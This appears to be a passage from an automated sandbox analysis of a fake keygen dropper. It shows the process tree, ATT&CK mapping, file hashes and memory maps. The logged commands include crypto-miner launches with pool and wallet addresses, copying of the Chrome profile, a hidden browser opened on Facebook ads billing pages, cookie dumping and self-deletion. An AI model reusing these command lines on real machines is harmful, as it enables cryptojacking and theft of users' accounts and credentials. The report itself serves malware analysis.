                                                                                                                                                                                                            • Suspicious use of NtCreateThreadExHideFromDebugger
                                                                                                                                                                                                            PID:1332
                                                                                                                                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                          taskkill -IM "keygen-step-5.exe" -F
                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                          • Kills process with taskkill
                                                                                                                                                                                                          PID:1744
                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX2\keygen-step-2.exe
                                                                                                                                                                                                    keygen-step-2.exe
                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                    PID:4196
                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\3B89.tmp.exe
                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\3B89.tmp.exe"
                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                                                      PID:5888
                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                        cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Roaming\3B89.tmp.exe"
                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                          PID:4988
                                                                                                                                                                                                          • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                            timeout /T 10 /NOBREAK
                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                            • Delays execution with timeout.exe
                                                                                                                                                                                                            PID:3984
                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                        "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX2\keygen-step-2.exe" >> NUL
                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                          PID:4564
                                                                                                                                                                                                          • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                                            ping 127.0.0.1
                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                            • Runs ping.exe
                                                                                                                                                                                                            PID:4668
                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX2\keygen-step-3.exe
                                                                                                                                                                                                        keygen-step-3.exe
                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                        PID:5832
                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                          cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX2\keygen-step-3.exe"
                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                            PID:5152
                                                                                                                                                                                                            • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                                              ping 1.1.1.1 -n 1 -w 3000
                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                              • Runs ping.exe
                                                                                                                                                                                                              PID:6068
                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\RarSFX2\keygen-step-4.exe
                                                                                                                                                                                                          keygen-step-4.exe
                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                          PID:5592
                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\RarSFX4\asdw.exe
                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\RarSFX4\asdw.exe"
                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                            • Drops file in Program Files directory
                                                                                                                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                            PID:3244
                                                                                                                                                                                                            • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                              "C:\Windows\System32\rundll32.exe" "C:\Program Files\pdfsetup.dll",install
                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                                                              • Modifies registry class
                                                                                                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                              PID:5952
                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\RarSFX4\file.exe
                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\RarSFX4\file.exe"
                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                            PID:968
                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\4B0A.tmp.exe
                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\4B0A.tmp.exe"
                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                              • Suspicious use of SetThreadContext
                                                                                                                                                                                                              PID:5412
                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\4B0A.tmp.exe
                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\4B0A.tmp.exe"
                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                • Checks processor information in registry
                                                                                                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                PID:200
                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\4CE0.tmp.exe
                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\4CE0.tmp.exe"
                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                              • Adds Run key to start application
                                                                                                                                                                                                              • Suspicious use of SetThreadContext
                                                                                                                                                                                                              PID:5452
                                                                                                                                                                                                              • C:\Windows\system32\msiexec.exe
                                                                                                                                                                                                                -o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8.w4016 --cpu-max-threads-hint 50 -r 9999
                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                • Blocklisted process makes network request
                                                                                                                                                                                                                PID:5812
                                                                                                                                                                                                              • C:\Windows\system32\msiexec.exe
                                                                                                                                                                                                                -P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.w254@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 99999
                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                  PID:5236
                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX4\file.exe"
                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                  PID:5860
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                                                    ping 127.0.0.1
                                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                                    • Runs ping.exe
                                                                                                                                                                                                                    PID:4616
                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX4\askinstall20.exe
                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\RarSFX4\askinstall20.exe"
                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                PID:5640
                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                  cmd.exe /c taskkill /f /im chrome.exe
                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                    PID:4036
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                      taskkill /f /im chrome.exe
                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                      • Kills process with taskkill
                                                                                                                                                                                                                      PID:5752
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                    xcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\" /s /e /y
                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                    • Enumerates system info in registry
                                                                                                                                                                                                                    PID:5268
                                                                                                                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-50000,-50000 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" https://www.facebook.com/ https://www.facebook.com/pages/ https://secure.facebook.com/ads/manager/account_settings/account_billing/
                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                    • Enumerates system info in registry
                                                                                                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                    • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                    PID:6008
                                                                                                                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xd4,0xd8,0xdc,0xb0,0xe0,0x7ffda5bf4f50,0x7ffda5bf4f60,0x7ffda5bf4f70
                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                        PID:196
                                                                                                                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1496,14368506486712247848,12531195195653074972,131072 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1504 /prefetch:2
                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                          PID:3288
                                                                                                                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1496,14368506486712247848,12531195195653074972,131072 --lang=en-US --service-sandbox-type=network --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=1868 /prefetch:8
                                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                          PID:4076
                                                                                                                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1496,14368506486712247848,12531195195653074972,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=2224 /prefetch:8
                                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                                            PID:4072
                                                                                                                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1496,14368506486712247848,12531195195653074972,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2776 /prefetch:1
                                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                                              PID:3532
                                                                                                                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1496,14368506486712247848,12531195195653074972,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2768 /prefetch:1
                                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                                                PID:4180
                                                                                                                                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1496,14368506486712247848,12531195195653074972,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3228 /prefetch:1
                                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                                  PID:5728
                                                                                                                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1496,14368506486712247848,12531195195653074972,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3216 /prefetch:1
                                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                                    PID:5768
                                                                                                                                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1496,14368506486712247848,12531195195653074972,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3648 /prefetch:1
                                                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                                                      PID:1872
                                                                                                                                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1496,14368506486712247848,12531195195653074972,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3912 /prefetch:1
                                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                                        PID:1080
                                                                                                                                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1496,14368506486712247848,12531195195653074972,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3880 /prefetch:1
                                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                                          PID:1672
                                                                                                                                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1496,14368506486712247848,12531195195653074972,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4792 /prefetch:1
                                                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                                                            PID:5468
                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX4\md4_4igk.exe
                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\RarSFX4\md4_4igk.exe"
                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                        • Checks whether UAC is enabled
                                                                                                                                                                                                                                        PID:6012
                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX4\BTRSetp.exe
                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\RarSFX4\BTRSetp.exe"
                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                        PID:5000
                                                                                                                                                                                                                                        • C:\ProgramData\2920817.exe
                                                                                                                                                                                                                                          "C:\ProgramData\2920817.exe"
                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                          PID:5072
                                                                                                                                                                                                                                        • C:\ProgramData\5589592.exe
                                                                                                                                                                                                                                          "C:\ProgramData\5589592.exe"
                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                          • Suspicious behavior: SetClipboardViewer
                                                                                                                                                                                                                                          PID:3328
                                                                                                                                                                                                                                        • C:\ProgramData\504276.exe
                                                                                                                                                                                                                                          "C:\ProgramData\504276.exe"
                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                          • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                          PID:5384
                                                                                                                                                                                                                                          • C:\ProgramData\504276.exe
                                                                                                                                                                                                                                            "{path}"
                                                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                            PID:4832
                                                                                                                                                                                                                                        • C:\ProgramData\7793248.exe
                                                                                                                                                                                                                                          "C:\ProgramData\7793248.exe"
                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                          PID:1148
                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX4\gcttt.exe
                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\RarSFX4\gcttt.exe"
                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                        PID:6052
                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                          PID:5536
                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                          PID:1568
                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                          PID:2280
                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                          PID:5524

                                                                                                                                                                                                                                Network

                                                                                                                                                                                                                                MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                                                                                                Persistence

                                                                                                                                                                                                                                Registry Run Keys / Startup Folder

                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                T1060

                                                                                                                                                                                                                                Defense Evasion

                                                                                                                                                                                                                                Modify Registry

                                                                                                                                                                                                                                2
                                                                                                                                                                                                                                T1112

                                                                                                                                                                                                                                Install Root Certificate

                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                T1130

                                                                                                                                                                                                                                Credential Access

                                                                                                                                                                                                                                Credentials in Files

                                                                                                                                                                                                                                4
                                                                                                                                                                                                                                T1081

                                                                                                                                                                                                                                Discovery

                                                                                                                                                                                                                                Query Registry

                                                                                                                                                                                                                                3
                                                                                                                                                                                                                                T1012

                                                                                                                                                                                                                                System Information Discovery

                                                                                                                                                                                                                                4
                                                                                                                                                                                                                                T1082

                                                                                                                                                                                                                                Remote System Discovery

                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                T1018

                                                                                                                                                                                                                                Collection

                                                                                                                                                                                                                                Data from Local System

                                                                                                                                                                                                                                4
                                                                                                                                                                                                                                T1005

                                                                                                                                                                                                                                Command and Control

                                                                                                                                                                                                                                Web Service

                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                T1102

                                                                                                                                                                                                                                Replay Monitor

                                                                                                                                                                                                                                Loading Replay Monitor...

                                                                                                                                                                                                                                Downloads

                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat
                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                  b52f78520be855c7f221e70be37bb353

                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                  fda1be96e32476b39cb4cc041cf88d31854138f7

                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                  d0ff1d99f3b136edf3394db584bd921a25800717df5614cb6927d0a06a0801e1

                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                  a189ff74225a71ce58e549600156e54596f11f040025e2543d005544a20bc26b770124aa2a59fdf9f190b629dabb2f64b2c88cae2b508122948f053e86d55289

                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exe
                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                  65b49b106ec0f6cf61e7dc04c0a7eb74

                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                  a1f4784377c53151167965e0ff225f5085ebd43b

                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                  862a8cf0e5561c848145a1a1f464acf77f92a3b15cc43722a7208701f60a2fcd

                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                  e9030cd609f42fb616e5bac3a5203ae46bbae9ec95682432a367f8805cdaa3e30c18a732ceddb0545ac653d543348a6728866149d2822752c80948066bfdf3da

                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exe
                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                  65b49b106ec0f6cf61e7dc04c0a7eb74

                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                  a1f4784377c53151167965e0ff225f5085ebd43b

                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                  862a8cf0e5561c848145a1a1f464acf77f92a3b15cc43722a7208701f60a2fcd

                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                  e9030cd609f42fb616e5bac3a5203ae46bbae9ec95682432a367f8805cdaa3e30c18a732ceddb0545ac653d543348a6728866149d2822752c80948066bfdf3da

                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat
                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                  39f80c4d452a26def7a2d05f32a74e02

                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                  de6ef8e49e7725f627b1d748d7138c226bff75e1

                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                  f8d3c7043a3308cc1dedcf76bc0cd484df93822a7e3edddcab1595bb4959e582

                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                  97f6af2ca63a6784b9d63d996d68cec36b7eca8a39a85ea6ef3e3d540594944a7539266fec15fa4843ec1cd87d9523a723cedf00b6feaa5cc666b99ae67adf56

                                                                                                                                                                                                                                • \??\pipe\crashpad_2204_KGDQFEMZBOYYGKDK
                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                  d41d8cd98f00b204e9800998ecf8427e

                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                  da39a3ee5e6b4b0d3255bfef95601890afd80709

                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                  e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                  cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                                                                                                                                                                                                                                • \??\pipe\crashpad_4804_RTNOCNPXWMZBDPEA
                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                  d41d8cd98f00b204e9800998ecf8427e

                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                  da39a3ee5e6b4b0d3255bfef95601890afd80709

                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                  e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                  cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                                                                                                                                                                                                                                • memory/68-274-0x000001538CF40000-0x000001538CFA7000-memory.dmp
                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                  412KB

                                                                                                                                                                                                                                • memory/192-206-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                • memory/204-219-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                • memory/352-216-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                • memory/492-258-0x000002449EB50000-0x000002449EBB7000-memory.dmp
                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                  412KB

                                                                                                                                                                                                                                • memory/508-195-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                • memory/744-137-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                • memory/752-194-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                • memory/936-221-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                • memory/1040-196-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                • memory/1052-141-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                • memory/1064-277-0x000001C9E5CB0000-0x000001C9E5D17000-memory.dmp
                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                  412KB

                                                                                                                                                                                                                                • memory/1100-217-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                • memory/1152-198-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                • memory/1188-265-0x0000016ABBB60000-0x0000016ABBBC7000-memory.dmp
                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                  412KB

                                                                                                                                                                                                                                • memory/1188-304-0x0000016ABBC90000-0x0000016ABBCF7000-memory.dmp
                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                  412KB

                                                                                                                                                                                                                                • memory/1344-160-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                • memory/1348-278-0x000001ECA7760000-0x000001ECA77C7000-memory.dmp
                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                  412KB

                                                                                                                                                                                                                                • memory/1348-306-0x000001ECA7D40000-0x000001ECA7DA7000-memory.dmp
                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                  412KB

                                                                                                                                                                                                                                • memory/1404-260-0x0000023008710000-0x0000023008777000-memory.dmp
                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                  412KB

                                                                                                                                                                                                                                • memory/1652-147-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                • memory/1680-197-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                • memory/1800-150-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                • memory/1824-153-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                • memory/1828-200-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                • memory/1952-262-0x000001EF56680000-0x000001EF566E7000-memory.dmp
                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                  412KB

                                                                                                                                                                                                                                • memory/1976-207-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                • memory/1984-199-0x0000000000000000-mapping.dmp
